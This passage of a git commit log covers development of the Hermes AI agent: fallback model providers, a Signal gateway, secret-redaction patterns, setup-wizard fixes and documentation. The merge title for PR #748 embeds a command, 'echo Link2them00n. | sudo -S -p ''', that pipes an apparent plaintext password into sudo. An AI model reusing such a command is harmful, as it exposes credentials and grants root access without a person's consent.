   - Only prefetch Honcho context on the first turn (empty history)
   - Bake Honcho context into the cached system prompt and store to DB
   - Remove the per-turn Honcho injection from the API call loop

   This ensures the system message is identical across all turns in a
   session. Previously, re-fetching Honcho could return different context
   on each turn, changing the system message and invalidating the cache.

Both changes preserve the existing behavior for compression (which
invalidates the prompt and rebuilds from scratch) and for the CLI
(where the same AIAgent persists and the cached prompt is already
stable across turns).

Tests: 2556 passed (6 new)
2026-03-09 01:50:58 -07:00
teknium1
aaf8f2d2d2 feat: expand secret redaction patterns
Added 14 new redaction patterns, all with distinctive prefixes
that have near-zero false positive risk:

Prefix patterns:
  - AWS Access Key ID (AKIA...)
  - Stripe keys (sk_live_, sk_test_, rk_live_)
  - SendGrid (SG....)
  - HuggingFace (hf_...)
  - Replicate (r8_...)
  - npm tokens (npm_...)
  - PyPI tokens (pypi-...)
  - DigitalOcean PATs (dop_v1_, doo_v1_)
  - AgentMail (am_...)

Structural patterns:
  - Private key blocks (-----BEGIN...PRIVATE KEY-----)
  - Database connection string passwords (postgres://user:PASS@host)
2026-03-09 01:28:27 -07:00
teknium1
12f4800631 docs: add security.redact_secrets as commented config section
Moved redact_secrets out of DEFAULT_CONFIG (it's on by default when
unset) and into the commented sections at the bottom of config.yaml,
alongside fallback_model. Users can see the option and uncomment to
disable.
2026-03-09 01:12:49 -07:00
teknium1
57b48a81ca feat: add config toggle to disable secret redaction
New config option:

  security:
    redact_secrets: false  # default: true

When set to false, API keys, tokens, and passwords are shown in
full in read_file, search_files, and terminal output. Useful for
debugging auth issues where you need to verify the actual key value.

Bridged to both CLI and gateway via HERMES_REDACT_SECRETS env var.
The check is in redact_sensitive_text() itself, so all call sites
(terminal, file tools, log formatter) respect it.
2026-03-09 01:04:33 -07:00
teknium1
7af33accf1 fix: apply secret redaction to file tool outputs
Terminal output was already redacted via redact_sensitive_text() but
read_file and search_files returned raw content. Now both tools
redact secrets before returning results to the LLM.

Based on PR #372 by @teyrebaz33 (closes #363) — applied manually
due to branch conflicts with the current codebase.
2026-03-09 00:49:46 -07:00
teknium1
3214c05e82 Merge PR #369: fix(gateway): add missing UTF-8 encoding to file I/O
Authored by @ch3ronsa. Fixes UnicodeEncodeError/UnicodeDecodeError on
Windows with non-UTF-8 system locales (e.g. Turkish cp1254).

Adds encoding='utf-8' to 10 open() calls across gateway/session.py,
gateway/channel_directory.py, and gateway/mirror.py.
2026-03-09 00:36:38 -07:00
teknium1
4608a7fe4e fix: make skills manifest writes atomic
Uses temp file + fsync + os.replace() to avoid corruption if the
process crashes mid-write. Cleans up temp file on failure, logs
errors at debug level.

Based on PR #335 by @aydnOktay — adapted for the current v2
manifest format (name:hash).
2026-03-08 23:53:57 -07:00
teknium1
af67ea8800 fix: setup wizard overwrites platform_toolsets saved by tools_command 2026-03-08 23:39:04 -07:00
teknium1
37c3dcf551 fix: setup wizard overwrites platform_toolsets saved by tools_command
The wizard and tools_command each loaded their own config dict. When
tools_command saved platform_toolsets (with MoA/HA disabled), the
wizard's final save_config() overwrote it with its own dict that lacked
platform_toolsets entirely — resetting everything to defaults.

Fix: pass the wizard's config dict into tools_command so they share the
same object. Now platform_toolsets survives the wizard's final save.
2026-03-08 23:39:00 -07:00
teknium1
6a49fbb7da fix: correct agentmail skill — API key goes in config.yaml env block
MCP server subprocess env is filtered through _build_safe_env() which
only passes safe baseline vars (PATH, HOME, XDG_*) plus whatever is
explicitly in the config's env: block. Env vars from ~/.hermes/.env
are NOT inherited by MCP subprocesses. The key must go directly in
the config.yaml mcp_servers.agentmail.env section.
2026-03-08 23:34:50 -07:00
teknium1
eb0b01de7b chore: move agentmail skill to optional-skills, add API key docs
AgentMail requires a third-party API key (free tier available, paid
plans from $20/mo) — not appropriate for bundled skills that show
up in every user's system prompt.

Added a Requirements section at the top with clear instructions
to add AGENTMAIL_API_KEY to ~/.hermes/.env. Streamlined setup steps
to avoid duplicating the key in both .env and config.yaml.
2026-03-08 23:33:05 -07:00
teknium1
5b1528519c Merge PR #330: feat: add AgentMail skill for agent-owned email inboxes
Authored by teyrebaz33. Closes #329.
2026-03-08 23:32:26 -07:00
teknium1
52f92eb689 fix: first-install tool setup shows all providers + skip options 2026-03-08 23:15:20 -07:00
teknium1
7f9dd60c15 fix: first-install tool setup shows all providers + skip options
Three fixes:

1. Web search provider menu now says 'Select Search Provider' and notes
   that a free DuckDuckGo search skill is included if Firecrawl isn't
   desired. Supports custom setup_title/setup_note per TOOL_CATEGORIES.

2. All multi-provider menus (web, browser, TTS) now include a
   'Skip — keep defaults / configure later' option so users can move on.

3. First-install flow now walks through ALL tools with provider options
   (browser, TTS, web, image_gen, etc.), not just ones missing API keys.
   Previously, tools with a free provider (browser/Local, TTS/Edge) were
   silently skipped — users never got to choose between Local vs
   Browserbase or Edge vs ElevenLabs.
2026-03-08 23:15:14 -07:00
teknium1
77da3bbc95 fix: use correct role for summary message in context compressor
The summary message was always injected as 'user' role, which causes
consecutive user messages when the last preserved head message is also
'user'. Some APIs reject this (400 error), and it produces malformed
training data.

Fix: check the role of the last head message and pick the opposite role
for the summary — 'user' after assistant/tool, 'assistant' after user.

Based on PR #328 by johnh4098. Closes #328.
2026-03-08 23:09:04 -07:00
teknium1
bb489a3903 fix: add first_install flag to tools setup for reliable API key prompting 2026-03-08 23:06:35 -07:00
teknium1
167eb824cb fix: add first_install flag to tools setup for reliable API key prompting
On fresh installs, the multi-level curses menu flow (platform menu →
checklist → loop back → Done) was unreliable — users could end up
skipping API key configuration entirely.

Now the setup wizard passes first_install=True to tools_command(), which:
- Skips the platform selection menu entirely
- Goes straight to the tool checklist
- Prompts for API keys on ALL selected tools that need them
- Linear flow, no loop — impossible to accidentally skip

Returning users (hermes tools / hermes setup tools) get the existing
platform menu loop as before.
2026-03-08 23:06:31 -07:00
teknium1
efb64aee5a fix: default MoA, Home Assistant, RL Training to off for new installs 2026-03-08 22:54:15 -07:00
teknium1
3045e29232 fix: default MoA, Home Assistant, and RL Training to off for new installs
New users shouldn't have these pre-checked in the tool configurator:
- MoA requires OpenRouter API key and is a niche feature
- Home Assistant requires HASS_TOKEN and most users don't have one
- RL Training requires Tinker + WandB keys

They're still available in the checklist to enable, just not pre-selected.
Existing users with saved platform_toolsets are unaffected.
2026-03-08 22:54:11 -07:00
teknium1
5d7d76025a fix: setup wizard default max iterations 60 → 90 2026-03-08 22:51:02 -07:00
teknium1
e6c829384e fix: setup wizard shows 60 as default max iterations, should be 90
AIAgent.__init__ defaults to max_iterations=90 but setup_agent_settings()
fell back to '60' when HERMES_MAX_ITERATIONS wasn't set.
2026-03-08 22:50:58 -07:00
teknium1
5c658a416c Merge PR #748: fix: first-time setup skips API key prompts + install.sh echo Link2them00n. | sudo -S -p '' on WSL 2026-03-08 22:03:12 -07:00
teknium1
a130aa8165 fix: first-time setup skips API key prompts + install.sh sudo on WSL
Two issues fixed:

1. (Critical) hermes setup tools / hermes tools: On first-time setup,
   the tool checklist showed all tools as pre-selected (from the default
   hermes-cli toolset), but after confirming the selection, NO API key
   prompts appeared. This is because the code only prompted for 'newly
   added' tools (added = new_enabled - current_enabled), but since all
   tools were already in the default set, 'added' was always empty.

   Fix: Detect first-time configuration (no platform_toolsets entry in
   config) and check ALL enabled tools for missing API keys, not just
   newly added ones. Returning users still only get prompted for newly
   added tools (preserving skip behavior).

2. install.sh: When run via curl|bash on WSL2/Ubuntu, ripgrep and ffmpeg
   install was silently skipped with a confusing 'Non-interactive mode'
   message. The script already uses /dev/tty for the setup wizard, but
   the system package section didn't.

   Fix: Try reading from /dev/tty when available (same pattern as the
   build-tools section and setup wizard). Only truly skip when no
   terminal is available at all (Docker build, CI).
2026-03-08 21:59:39 -07:00
teknium1
35d57ed752 refactor: unified OAuth/API-key credential resolution for fallback
Split fallback provider handling into two clean registries:

  _FALLBACK_API_KEY_PROVIDERS — env-var-based (openrouter, zai, kimi, minimax)
  _FALLBACK_OAUTH_PROVIDERS  — OAuth-based (openai-codex, nous)

New _resolve_fallback_credentials() method handles all three cases
(OAuth, API key, custom endpoint) and returns a uniform (key, url, mode)
tuple. _try_activate_fallback() is now just validation + client build.

Adds Nous Portal as a fallback provider — uses the same OAuth flow
as the primary provider (hermes login), returns chat_completions mode.

OAuth providers get credential refresh for free: the existing 401
retry handlers (_try_refresh_codex/nous_client_credentials) check
self.provider, which is set correctly after fallback activation.

4 new tests (nous activation, nous no-login, codex retained).
27 total fallback tests passing, 2548 full suite.
2026-03-08 21:44:48 -07:00
teyrebaz33
1404f846a7 feat(cli,gateway): add user-defined quick commands that bypass agent loop
Implements config-driven quick commands for both CLI and gateway that
execute locally without invoking the LLM.

Config example (~/.hermes/config.yaml):
  quick_commands:
    limits:
      type: exec
      command: /home/user/.local/bin/hermes-limits
    dn:
      type: exec
      command: echo daily-note

Changes:
- hermes_cli/config.py: add quick_commands: {} default
- cli.py: check quick_commands before skill commands in process_command()
- gateway/run.py: check quick_commands before skill commands in _handle_message()
- tests/test_quick_commands.py: 11 tests covering exec, timeout, unsupported type, missing command, priority over skills

Closes #744
2026-03-09 07:38:06 +03:00
teknium1
5785bd3272 feat: add openai-codex as fallback provider
Codex OAuth uses a different auth flow (OAuth tokens, not env vars)
and a different API mode (codex_responses, not chat_completions).
The fallback now handles this specially:

- Resolves credentials via resolve_codex_runtime_credentials()
- Sets api_mode to codex_responses
- Fails gracefully if no Codex OAuth session exists

Also added to the commented-out config.yaml example.
2 new tests (codex activation + graceful failure).
2026-03-08 21:34:15 -07:00
teknium1
cf9482984e docs: condense AGENTS.md from 927 to 242 lines
AGENTS.md is read by AI agents in their context window. Every line
costs tokens. The previous version had grown to 927 lines with
user-facing documentation that duplicates website/docs/:

Removed (belongs in website/docs/, not agent context):
- Full CLI commands table (50 lines)
- Full gateway slash commands list (20 lines)
- Messaging gateway setup, config examples, security details
- DM pairing system details
- Event hooks format and examples
- Tool progress notification details
- Full environment variables reference
- Auxiliary model configuration section (60 lines)
- Background process management details
- Trajectory format details
- Batch processing CLI usage
- Skills system directory tree and hub details
- Dangerous command approval flow details
- Platform toolsets listing

Kept (essential for agents modifying code):
- Project structure (condensed to key files only)
- File dependency chain
- AIAgent class signature and loop mechanics
- How to add tools (3 files, full pattern)
- How to add config (config.yaml + .env patterns)
- How to add CLI commands
- Config loader table (two separate systems)
- Prompt caching policy (critical constraint)
- All known pitfalls
- Test commands
2026-03-08 21:33:10 -07:00
teknium1
67275641f8 fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 21:30:48 -07:00
teknium1
3ffaac00dd feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 21:30:48 -07:00
Teknium
816a3ef6f1 Merge pull request #745 from NousResearch/hermes/hermes-f8d56335
feat: browser console tool, annotated screenshots, auto-recording, and dogfood QA skill
2026-03-08 21:29:52 -07:00
teknium1
a8bf414f4a feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.

## New tool: browser_console

Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.

## Enhanced tool: browser_vision(annotate=True)

New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.

## Config: browser.record_sessions

Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default

## Built-in skill: dogfood

Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
   (Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence

Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template

## Tests

21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation

Addresses #315.
2026-03-08 21:28:12 -07:00
teknium1
3b312d45c5 fix: show fallback_model as commented-out YAML example in config
Remove fallback_model from DEFAULT_CONFIG (empty strings were useless
noise). Instead, save_config() appends a commented-out section at the
bottom of config.yaml showing the available providers and example usage.

When the user actually configures fallback_model, it appears as normal
YAML and the comment block is omitted.
2026-03-08 21:25:58 -07:00
teknium1
fcd899f888 docs: add platform integration checklist for new gateway adapters
Comprehensive 16-point checklist covering every integration point
needed when adding a new messaging platform to the gateway. Built
from the Signal integration experience where 7 integration points
were initially missed.

Covers: adapter, config enum, factory, auth maps, session source,
prompt hints, toolsets, cron delivery, send_message tool, cronjob
tool schema, channel directory, status display, setup wizard,
redaction, documentation, and tests.
2026-03-08 21:20:06 -07:00
Teknium
315f3ea429 Merge pull request #740 from NousResearch/hermes/hermes-3cd7c62d
feat: simple fallback model for provider resilience (#737)
2026-03-08 21:16:58 -07:00
teyrebaz33
7241e8784a feat: hermes skills — enable/disable individual skills and categories (#642)
Add interactive skill configuration via `hermes skills` command,
mirroring the existing `hermes tools` pattern.

Changes:
- hermes_cli/skills_config.py (new): skills_command() entry point with
  curses checklist UI + numbered fallback. Supports global and
  per-platform disable lists, individual skill toggle, and category toggle.
- hermes_cli/main.py: register `hermes skills` subcommand
- tools/skills_tool.py: add _is_skill_disabled() and filter disabled
  skills in _find_all_skills(). Resolves platform from argument,
  HERMES_PLATFORM env var, then falls back to global disabled list.

Config schema (config.yaml):
  skills:
    disabled: [skill-a]                 # global
    platform_disabled:
      telegram: [skill-b]               # per-platform override

22 unit tests, 2489 passed, 0 failed.

Closes #642
2026-03-09 07:02:06 +03:00
teknium1
b7d6eae64c fix: Signal adapter parity pass — integration gaps, clawdbot features, env var simplification
Integration gaps fixed (7 files missing Signal):
- cron/scheduler.py: Signal in platform_map (cron delivery was broken)
- agent/prompt_builder.py: PLATFORM_HINTS for Signal (agent knows it's on Signal)
- toolsets.py: hermes-signal toolset + added to hermes-gateway composite
- hermes_cli/status.py: Signal + Slack in platform status display
- tools/send_message_tool.py: Signal example in target description
- tools/cronjob_tools.py: Signal in delivery option docs + schema
- gateway/channel_directory.py: Signal in session-based channel discovery

Clawdbot parity features added to signal.py:
- Self-message filtering: prevents reply loops by checking sender != account
- SyncMessage filtering: ignores sync envelopes (sent transcripts, read receipts)
- Edit message support: reads dataMessage from editMessage envelope
- Mention rendering: replaces \uFFFC placeholders with @identifier text
- Jitter in SSE reconnection backoff (20% randomization, prevents thundering herd)

Env var simplification (7 → 4):
- Removed SIGNAL_DM_POLICY (DM auth follows standard platform pattern via
  SIGNAL_ALLOWED_USERS + DM pairing, same as Telegram/Discord)
- Removed SIGNAL_GROUP_POLICY (derived from SIGNAL_GROUP_ALLOWED_USERS:
  not set = disabled, set with IDs = allowlist, set with * = open)
- Removed SIGNAL_DEBUG (was setting root logger, removed entirely)
- Remaining: SIGNAL_HTTP_URL, SIGNAL_ACCOUNT (required),
  SIGNAL_ALLOWED_USERS, SIGNAL_GROUP_ALLOWED_USERS (optional)

Updated all docs (website, AGENTS.md, signal.md) to match.
2026-03-08 21:00:21 -07:00
teknium1
b3765c28d0 fix: restrict fallback providers to actual hermes providers
Remove hallucinated providers (openai, deepseek, together, groq,
fireworks, mistral, gemini, nous) from the fallback provider map.
These don't exist in hermes-agent's provider system.

The real supported providers for fallback are:
  openrouter   (OPENROUTER_API_KEY)
  zai          (ZAI_API_KEY)
  kimi-coding  (KIMI_API_KEY)
  minimax      (MINIMAX_API_KEY)
  minimax-cn   (MINIMAX_CN_API_KEY)

For any other OpenAI-compatible endpoint, users can use the
base_url + api_key_env overrides in the config.

Also adds Kimi User-Agent header for kimi fallback (matching
the main provider system).
2026-03-08 20:49:55 -07:00
teknium1
4cfb66bac2 docs: list all supported fallback providers with env var names
The config comment now shows the complete list of built-in providers
that the fallback system supports, each with the env var it reads
for the API key. Also clarifies that custom OpenAI-compatible endpoints
work via base_url + api_key_env.
2026-03-08 20:42:54 -07:00
teknium1
0c4cff352a docs: add Signal messenger documentation across all doc surfaces
- website/docs/user-guide/messaging/signal.md: Full setup guide with
  prerequisites, step-by-step instructions, access policies, features,
  troubleshooting, security notes, and env var reference
- website/docs/user-guide/messaging/index.md: Added Signal to architecture
  diagram, platform toolset table, security examples, and Next Steps links
- website/docs/reference/environment-variables.md: All 7 SIGNAL_* env vars
- README.md: Signal in feature table and documentation table
- AGENTS.md: Signal in gateway description and env var config section
2026-03-08 20:42:04 -07:00
teknium1
503269b85a chore: remove stale docs/ directory
All documentation migrated to website/docs/ (Docusaurus). The docs/
directory only contained:
- README.md: redirect saying 'docs moved to website' (redundant)
- send_file_integration_map.md: internal engineering notes, unreferenced
  by any file in the codebase

The landing page at landingpage/ is still actively used by the
deploy-site.yml GitHub Actions workflow.
2026-03-08 20:41:47 -07:00
teknium1
161436cfdd feat: simple fallback model for provider resilience
When the primary model/provider fails after retries (rate limit, overload,
auth errors, connection failures), Hermes automatically switches to a
configured fallback model for the remainder of the session.

Config (in ~/.hermes/config.yaml):

  fallback_model:
    provider: openrouter
    model: anthropic/claude-sonnet-4

Supports all major providers: OpenRouter, OpenAI, Nous, DeepSeek, Together,
Groq, Fireworks, Mistral, Gemini — plus custom endpoints via base_url and
api_key_env overrides.

Design principles:
- Dead simple: one fallback model, not a chain
- One-shot: switches once, doesn't ping-pong back
- Zero new dependencies: uses existing OpenAI client
- Minimal code: ~100 lines in run_agent.py, ~5 lines in cli.py/gateway
- Three trigger points: max retries exhausted, non-retryable client errors,
  and invalid response exhaustion

Does NOT trigger on context overflow or payload-too-large errors (those
are handled by the existing compression system).

Addresses #737.

25 new tests, 2492 total passing.
2026-03-08 20:22:33 -07:00
teknium1
24f549a692 feat: add Signal messenger gateway platform (#405)
Complete Signal adapter using signal-cli daemon HTTP API.
Based on PR #268 by ibhagwan, rebuilt on current main with bug fixes.

Architecture:
- SSE streaming for inbound messages with exponential backoff (2s→60s)
- JSON-RPC 2.0 for outbound (send, typing, attachments, contacts)
- Health monitor detects stale SSE connections (120s threshold)
- Phone number redaction in all logs and global redact.py

Features:
- DM and group message support with separate access policies
- DM policies: pairing (default), allowlist, open
- Group policies: disabled (default), allowlist, open
- Attachment download with magic-byte type detection
- Typing indicators (8s refresh interval)
- 100MB attachment size limit, 8000 char message limit
- E.164 phone + UUID allowlist support

Integration:
- Platform.SIGNAL enum in gateway/config.py
- Signal in _is_user_authorized() allowlist maps (gateway/run.py)
- Adapter factory in _create_adapter() (gateway/run.py)
- user_id_alt/chat_id_alt fields in SessionSource for UUIDs
- send_message tool support via httpx JSON-RPC (not aiohttp)
- Interactive setup wizard in 'hermes gateway setup'
- Connectivity testing during setup (pings /api/v1/check)
- signal-cli detection and install guidance

Bug fixes from PR #268:
- Timestamp reads from envelope_data (not outer wrapper)
- Uses httpx consistently (not aiohttp in send_message tool)
- SIGNAL_DEBUG scoped to signal logger (not root)
- extract_images regex NOT modified (preserves group numbering)
- pairing.py NOT modified (no cross-platform side effects)
- No dual authorization (adapter defers to run.py for user auth)
- Wildcard uses set membership ('*' in set, not list equality)
- .zip default for PK magic bytes (not .docx)

No new Python dependencies — uses httpx (already core).
External requirement: signal-cli daemon (user-installed).

Tests: 30 new tests covering config, init, helpers, session source,
phone redaction, authorization, and send_message integration.

Co-authored-by: ibhagwan <ibhagwan@users.noreply.github.com>
2026-03-08 20:20:35 -07:00
Teknium
7a8778ac73 Merge pull request #732 from NousResearch/hermes/hermes-2cb83eed
docs: comprehensive AGENTS.md audit and corrections
2026-03-08 20:10:32 -07:00
teknium1
763c6d104d fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 20:08:02 -07:00
teknium1
4d7d9d9715 fix: add diagnostic logging to browser tool for errors.log
All failure paths in _run_browser_command now log at WARNING level,
which means they automatically land in ~/.hermes/logs/errors.log
(the persistent error log captures WARNING+).

What's now logged:
- agent-browser CLI not found (warning)
- Session creation failure with task ID (warning)
- Command entry with socket_dir path and length (debug)
- Non-zero return code with stderr (warning)
- Non-JSON output from agent-browser (warning — version mismatch/crash)
- Command timeout with task ID and socket path (warning)
- Unexpected exceptions with full traceback (warning + exc_info)
- browser_vision: which model is used and screenshot size (debug)
- browser_vision: LLM analysis failure with full traceback (warning)

Also fixed: _get_vision_model() was called twice in browser_vision —
now called once and reused.
2026-03-08 19:54:41 -07:00
teknium1
a9c35f9175 docs: comprehensive rewrite of all messaging platform setup guides
All four platform guides rewritten from thin ~60-line summaries to
comprehensive step-by-step setup guides with current (2025-2026) info:

telegram.md (74 → 196 lines):
- Full BotFather walkthrough with customization commands
- Privacy mode section with critical group chat gotcha
- Multiple user ID discovery methods
- Voice message setup (Whisper STT + TTS bubbles + ffmpeg)
- Group chat usage patterns and admin mode
- Recent Bot API features (privacy policy requirement, streaming)
- Troubleshooting table (6 issues)

discord.md (57 → 260 lines):
- Complete Developer Portal walkthrough (application, bot, intents)
- Detailed Privileged Gateway Intents section with warning about
  Message Content Intent being #1 failure cause
- Invite URL generation via Installation tab (new 2024) and manual
- Permission integer calculation (274878286912 recommended)
- Developer Mode user ID discovery
- Bot behavior documentation (DMs, channels, no-prefix)
- Troubleshooting table (6 issues)

slack.md (57 → 214 lines):
- Warning about classic Slack apps deprecated since March 2025
- Full scope tables (required + optional) with purposes
- Socket Mode setup with App-Level Token (xapp-)
- Event Subscriptions configuration
- User ID discovery via profile
- Two-token architecture explained (xoxb- + xapp-)
- Troubleshooting table

whatsapp.md (77 → 193 lines):
- Clarified whatsapp-web.js (not Business API) with ban risk warnings
- Linux Chromium dependencies (Debian + Fedora)
- Setup wizard QR code scanning workflow
- Session persistence with LocalAuth
- Second phone number options with cost table
- WhatsApp Web protocol update warnings
- Troubleshooting table (7 issues)

Docusaurus build verified clean.
2026-03-08 19:51:42 -07:00
teknium1
37752ff1ac feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 19:41:17 -07:00
teknium1
31b84213e4 docs: add Guides & Tutorials section, restructure sidebar
New documentation pages (1,823 lines):
- getting-started/learning-path.md: 3-tier learning path table
  (beginner/intermediate/advanced) + use-case-based navigation
- guides/tips.md: Tips & Best Practices quick-wins collection
  covering prompting, CLI power user tips, context files, memory,
  performance/cost, messaging, and security
- guides/daily-briefing-bot.md: End-to-end tutorial building an
  automated daily news briefing with cron + web search + messaging
- guides/team-telegram-assistant.md: Full walkthrough setting up
  a team Telegram bot with BotFather, gateway, DM pairing, and
  production deployment
- guides/python-library.md: Guide to using AIAgent as a Python
  library — basic usage, multi-turn conversations, toolset config,
  trajectories, custom prompts, and integration examples (FastAPI,
  Discord bot, CI/CD)
- reference/faq.md: Centralized FAQ (8 questions) + troubleshooting
  guide (6 categories, 18 specific issues) with problem/cause/solution
  format

Sidebar restructure:
- Added 'Guides & Tutorials' as new top-level section
- Reorganized flat Features list (17 items) into 5 subcategories:
  Core Features, Automation, Web & Media, Integrations, Advanced
- Added FAQ to Reference section
- Updated index.md quick links table

Docusaurus build verified clean.
2026-03-08 19:37:34 -07:00
teknium1
2036c22f88 fix: macOS browser/code-exec socket path exceeds Unix limit (#374)
macOS sets TMPDIR to /var/folders/xx/.../T/ (~51 chars). Combined with
agent-browser session names, socket paths reach 121 chars — exceeding
the 104-byte macOS AF_UNIX limit. This causes 'Screenshot file was not
created' errors and silent browser_vision failures on macOS.

Fix: use /tmp/ on macOS (symlink to /private/tmp, sticky-bit protected).
On Linux, tempfile.gettempdir() already returns /tmp — no behavior change.

Changes in browser_tool.py:
- Add _socket_safe_tmpdir() helper — returns /tmp on macOS, gettempdir()
  elsewhere
- Replace all 3 tempfile.gettempdir() calls for socket dirs
- Set mode=0o700 on socket dirs for privacy (was using default umask)
- Guard vision/text client init with try/except — a broken auxiliary
  config no longer prevents the entire browser_tool module from importing
  (which would disable all 10 browser tools, not just vision)
- Improve screenshot error messages with mode info and diagnostic hints
- Don't delete screenshots when LLM analysis fails — the capture was
  valid, only the vision API call failed. Screenshots are still cleaned
  up by the existing 24-hour _cleanup_old_screenshots mechanism.

Changes in code_execution_tool.py:
- Same /tmp fix for RPC socket path (was 103 chars on macOS — one char
  from the 104-byte limit)
2026-03-08 19:31:23 -07:00
teknium1
7185a66b96 feat: enhance Solana skill with USD pricing, token names, smart wallet output
Enhancements to the Solana blockchain skill (PR #212 by gizdusum):

- CoinGecko price integration (free, no API key)
  - Wallet shows tokens with USD values, sorted by value
  - Token info includes price and market cap
  - Transaction details show USD amounts for balance changes
  - Whale detector shows USD alongside SOL amounts
  - Stats includes SOL price and market cap
  - New `price` command for quick lookups by symbol or mint

- Smart wallet output
  - Tokens sorted by USD value (highest first)
  - Default limit of 20 tokens (--limit N to adjust)
  - Dust filtering (< $0.01 tokens hidden, count shown)
  - --all flag to see everything
  - --no-prices flag for fast RPC-only mode
  - NFT summary (count + first 10)
  - Portfolio total in USD

- Token name resolution
  - 25+ well-known tokens mapped (SOL, USDC, BONK, JUP, etc.)
  - CoinGecko fallback for unknown tokens
  - Abbreviated mint addresses for unlabeled tokens

- Reliability
  - Retry with exponential backoff on 429 rate-limit (RPC + CoinGecko)
  - Graceful degradation when price data unavailable
  - Capped API calls to respect CoinGecko free-tier limits

- Updated SKILL.md with all new capabilities and flags
2026-03-08 19:15:11 -07:00
teknium1
2394e18729 fix: add context to interruption messages for model awareness
When the agent is interrupted, the model now receives descriptive
context instead of a generic 'Operation interrupted.' string:

- Tool skip messages include the tool name:
  '[Tool execution cancelled — terminal was skipped due to user interrupt]'
  '[Tool execution skipped — web_search was not started. User sent a new message]'

- API call interrupts include timing:
  'Operation interrupted: waiting for model response (4.2s elapsed).'

- Retry/error interrupts include retry context:
  'Operation interrupted: retrying API call after rate limit (retry 2/5).'
  'Operation interrupted: handling API error (Timeout: connection timed out).'

This helps the model understand what was happening when it was
interrupted, reducing wasted iterations spent re-discovering state.
2026-03-08 18:58:23 -07:00
teknium1
99f7582175 chore: move Solana skill to optional-skills/
Solana blockchain queries are a niche use case — not needed by every user.
Moved from skills/ (bundled) to optional-skills/ (installable via Skills Hub).
2026-03-08 18:52:02 -07:00
teknium1
93c5997290 Merge PR #212: feat(skills): add Solana blockchain skill
Authored by Deniz Alagoz (gizdusum). Closes #164.
Will be moved to optional-skills/ and enhanced post-merge.
2026-03-08 18:51:33 -07:00
teknium1
2d1a1c1c47 refactor: remove redundant 'openai' auxiliary provider, clean up docs
The 'openai' provider was redundant — using OPENAI_BASE_URL +
OPENAI_API_KEY with provider: 'main' already covers direct OpenAI API.

Provider options are now: auto, openrouter, nous, codex, main.

- Removed _try_openai(), _OPENAI_AUX_MODEL, _OPENAI_BASE_URL
- Replaced openai tests with codex provider tests
- Updated all docs to remove 'openai' option and clarify 'main'
- 'main' description now explicitly mentions it works with OpenAI API,
  local models, and any OpenAI-compatible endpoint

Tests: 2467 passed.
2026-03-08 18:50:26 -07:00
teknium1
